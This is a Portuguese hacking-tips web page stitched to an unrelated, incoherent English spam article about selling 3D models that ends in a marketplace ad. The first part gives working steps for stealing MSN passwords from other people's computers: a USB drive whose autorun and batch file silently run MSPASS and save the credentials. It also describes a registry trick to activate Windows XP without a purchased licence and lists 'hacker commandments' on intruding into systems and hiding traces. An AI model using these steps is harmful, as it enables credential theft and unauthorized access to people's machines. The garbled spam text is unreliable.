Parceiro de qualidade


Passe o curso aki em cima!!!


Atualização Incrivel

Roubando senha de MSN com pendrive

1- A primeira coisa que você precisa é de um pen-drive.

2- Então vc Faz o Download do MSPASS aqui

3- Abra seu pendriver e crie um documento de texto chamado Autorun.inf , nele você deverá escrever isso nele: 
ACTION = meuusb 

(Depois de escrever isto você tem que salvar o arquivo como "Autostart.inf". E no lugar de "meuusb" é obviamente o nome do pendriver, podendo ser Disco removível, ou sei lá oque!

4- Então crie uma pasta chamada mspass, nesta pasta você copiar o mspass.exe que vc baixou 

5- Então você cria um arquivo de texto e salva como "launch.bat".
neste arquivo você escreve
start mspass\mspass.exe /stext mspass.txt 

6- Pronto!

Você colocar o o seu pen driver em qualquer computador, o autostart.inf lançará o mspass. Depois de alguns segundos você pode remover o pendriver USB, e haverá uma arquivo novo . Txt em que o msn e a senha estará escrito.

 Qer Mais veja:

[NOTÍCIA] Justin biba Bieber se exibe na Webcam

Temos em ultima mão um "print" de Justin Bieber se exibindo na Webcam... é chocante:

Baby, baby, baby..., baby, baby....

::teste a real velocidade da sua internet

Velocimetro RJNET

::Sua impressora esta imprimindo arquivos antigos

esse progama ele serve para aqueles que quando foi imprimir alguns aquivos esqueceran de colocar as folhas.e o que tem aver isso?você devem esta se perguntando e porque algumas impressoras não deleta o arquivo que não foi imprimido,assim ela toda vez que você ligar a impressora ela ira imprimir o arquivo que esta em espera.mas ela não aceita deletar o arquivo que esta em epera obs:não e todas impressoras

Oque o programa faz ele pausa o spoler"o software da impressora" assim você pode deletar o arquivo que fica em modo de espera

como usalo?essor executa-lo esperar um pouco assim vai aperecer a messajem com a seguinte escrita "pressione qualque tecla para comtinuar" aperte ente e depois deleta o arquivo de impressão do modo de espera e pronto







::Como validar o windows xp seu usar progama

Nessa explicação abaixo irei mostrar de forma fácil e rápida como validar seu Windows XP em apenas alguns minutos. O Ideal mesmo é comprar a licença, pois com a mesma conseguimos, ter acesso a muitas atualizações, diretamente do site da microsoft.

Então vamos lá passo a passo:

1º - Vá em Iniciar > Executar

2º- Digite regedit e clique em OK.

3º- Uma Janela irá abrir, dentro do regedit,procure pela chave do lado esquerdo:

4º-No painel à direita, clique duas vezes em OOBETimer

5º-Na janela que foi aberta, apague qualquer valor e clique em OK. Feche o

6º- Vá novamente em Iniciar > Executar e dessa vez digite:
%systemroot%\System32\oobe\msoobe.exe /a

7º-Na janela que foi aberta, escolha a opção Sim, desejo telefonar…

8º-Na próxima etapa, clique no botão Alterar chave de produto.

9º- Na etapa seguinte, digite a CD- key, (serial válido do windows):


e clique no botão Atualizar

10º- Após clicar no botão Atualizar, o assistente para ativação voltará para a janela anterior, então, clique em Lembrar mais tarde e reinicie o seu computador.

11º- Após reiniciado o computador vá novamente em Iniciar > Executar e digite:
%systemroot%\system32\oobe\msoobe.exe /a

E pronto, Seu sistema está validado e pronto para uso !

::Vai uma brincadeira para descontrair

Mandamento dos hackes

01- Descobriu algo novo? OLHE!

02- NÃO APAGUE, pense no que seria melhor; ter acesso a um provedor ou detona-lo?

03- NÃO MODIFIQUE NADA, ao menos que queira que saibam que esteve lá.

04- Nunca tente um su root direto! Isso fica logado...

05- Não fique dando telnet ou pegando mail usando acesso dos outros!

06- Nunca subestime um sysop.

07- Escolha horas entre 24:30 as 6:00.

08- Uma vez lá dentro, tente dominar o lugar, e' claro, com cautela.

09- Não confie em ninguém. (salvo seu cachorro ou sua planta).

10- Se pegar a senha do root de algum provedor e não souber o que fazer, MATE-SE!

11- Nunca teste vírus no seu próprio HD.

12- É bom preparar muito bem uma estratégia antes de atacar.

13- Use os computadores de sua universidade (é mais seguro).

14- Não fique distribuindo informações para ninguém ou dados sobre o que você pegou.

15- NÃO OBEDEÇA REGRAS. Claro que estas têm que ser cumpridas.

16- Não tenha pena de ninguém.

17- Pc usa o MS-DOS ou o Windows? Não conte pra ninguém...

18- Pc usa o UNIX ou LINUX? Esteja certo que esta bem seguro...

19- Não crie laços afetivos com a vítima.

20- Aprenda o máximo que puder com quem sabe mais! Não se meta a besta direto.

ÚLTIMO- Não se submeta a nenhum sistema hierárquico. Administradores fedem.



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The Upside to 3d Models for Game Development

<h2> One Thing to execute for Selling 3d Models </h2>
Let's look at unique industries that have been transformed by 3D printing and the way to earn cash with a 3D printer. Google Shopping may not be ignored. Remix 3D isn't available in all nations.
<h2> The Secret to Selling 3d Models </h2>
CAD models often have to be simplified before being converted into a real-time format, which could occasionally be carried out automatically. If you don't have Visual Studio, Autodesk has a WebGL viewer which allows drag-and-drop and doesn't take a login. Revit includes a user interface that is very customizable, supporting numerous approaches for using the program.
<h2> The Number One Question You Must Ask for Selling 3d Models </h2>
The finished models do absorb water, but they could also be sprayed to attain a glossy finish. There was a good deal of wasted space within the body of the snack holder which I wished to use also. A great place to begin is their power pod collection.
<h2> Things You Won't Like About Selling 3d Models and Things You Will </h2>
If you get a good idea for a fitness app, then we'd be quite pleased to hear about it! Crossfit training needs a well-balanced program, and there are a good deal of apps that may help users organize their workouts. The screen isn't as vibrant as modern iPhones, but nonetheless, it never offends.
<h2> Whispered Selling 3d Models Secrets </h2>
Well, among the biggest reasons have to be the cheaper price tag, believe it or not. Set up your google buying ad with Adwords and you will notice buyers, however, you will want to cover play. Pricing could possibly be adversely affected.
<h2> Life, Death, and Selling 3d Models </h2>
Painting a surface isn't as simple as it looks. The models are offered in a lot of collections for straightforward navigation. The rest of the models can be created printable due to a relation to the 3DPrintCloud.
<h2> The Pain of Selling 3d Models </h2>
Unity doesn't have any service to achieve that. For hardware providers, it is more challenging to set the team together. The organization is planning to expand the usage of 3D printing in different products.
All the exact same features which make Interactive 3D compelling for education, also allow it to be great for content advertising. To understand the advantages of immersive technology like VR, AR and MR, it's important that you know how each work behind the scenes. At this time you can construct your creative abilities and abilities utilizing the super technology.
<h2>Type of Selling 3d Models </h2>
Increasingly, it's quality that matters more than costs and is the actual measure of succeeding. You receive the money now rather than later. If you want to speak about selling your house, or only the market in general, don't hesitate to reach out to me anytime.
<h2> The Selling 3d Models Pitfall </h2>
A Money-maker You have the capacity to use your 3D printer to earn you some excess money. Players have a choice to customize their avatars, together with a choice to purchase furniture for their property. Right from the internet shop, users could put on a VR headset and see the desk facing them.
A huge number of designs and a massive assortment of 3D designs won't necessarily guarantee many sales. If you don't want to get a wooden floor, you always have the option to go ahead with wood-finish kitchen tiles as it would be simple to maintain. While designing your kitchen, you have to be careful with regards to picking tiles.
<h2> Getting the Best Selling 3d Models </h2>
Furthermore, productizing your services can be an excellent way to help customers understand just what you can do for them. Therefore, if you connect the net, you are definitely able to edit and deploy your project that has any devices. Companies want to anticipate the requirements of their clientele and supply the very best possible quality.
Post manufacturing upkeep of the app and its costs depend a lot on the organization you're working with. You are able to join the one which you feel meets your needs best, or you are able to join a variety of unique sites to explore more possibilities. An easy contract with a mobile app development provider or freelance mobile app developer is likely to make the full process quick and productive.
<h2> The Downside Risk of Selling 3d Models </h2>
Many brands, especially the inexpensive ones, have very bad tolerances that aren't too fantastic for your printer and they're going to create poor, inconsistent models. Copping the industry example of inkjet printers really isn't the way to go in 3D printing. The Carbon M2 printers are famed for speed and can print one sole in half an hour.
<h2> Selling 3d Models - Dead or Alive? </h2>
Many bodily stores struggle to remain in the game as a result of high rent, whilst online merchants don't need to be concerned about that. If you only want to create the world a better place, you'll find inspiration in the Charity Miles app. The game contains various online games and activities in the digital world, where players receive their cartoon avatars that arrive with assorted customization choices.
<h2> The Pain of Selling 3d Models </h2>
The course covers the info you have to do that as well, but most importantly it's about really being a fantastic modeler. The process took two or three days to receive all the variations done. Just visit the website select the item, then you are going to receive offers or the price and after that after confirmation, they'll do all the remaining part of work.
<h2> All About Selling 3d Models </h2>
Nevertheless, you might not wish to provide a way to the entire planet, and you might not have the resources to totally design every area. In many instances, it's the only view you have to demonstrate the audience for them to find a whole comprehension of the design and its functions. So it may be a great time to begin helping the business shift.
<h2> Finding Selling 3d Models </h2>
There are full instructions about how to download models written both by Fabbaloo and Instructables, though it ought to be stressed that it's possibly just cheaper and simpler to purchase the batch-made parts direct from McMaster. Fun objects can be readily created. If you may shop local, Hobby stores are difficult to come by but they are sometimes great homes away from home.
<h2> The Argument About Selling 3d Models </h2>
Different design needs to be tested in various ways. There's a paradigm shift in how homebuilders plan, design, construct and advertise their houses. Once you choose to create a home, you can sit with the designer to provide you with the simple layout with the support of a computer software.
<h2>Best marketplace with highest Commission for vendors</h2>
If you are a game developer and you don’t want to spend hundreds of hours modeling then by yourself consider purchasing 3d models.

Of course, you will be looking for the low-cost market with remarkable quality because games demand many 3d models in order to start level designing, for that we advise you to obtain 3dcgstore marketplace.

You can also contact their support team and tell them the assets that you want, they will provide it in swiftly with amazing price.

You can even require for sounds, animation, rigging, and specification for example low poly and usable on game engines like unreal engine and so on, having a price you will find amazingly detailed 3d models .

You can get the 3d models even for cheaper price cause if pay out with account funds you'll get 3% discount if you review or share the items you will get even more discounts discounts.

In 3dcgstore marketplace, loyal customers will receive VIP gifts that worth lots of money for free.

If you like a game character and want to use it in-game design but you couldn’t find it anywhere nor design it by your self then you should visit 3dcgstore marketplace, they have designers who spend most of their time designing top favorite game characters.

If you actually are a professional 3d designer and you make cash online then you'll be looking for your highest commission marketplace, 3dcgstore considered the highest commission provider, over 80% return for every product you sell, you also will have personalized page and store within the site.


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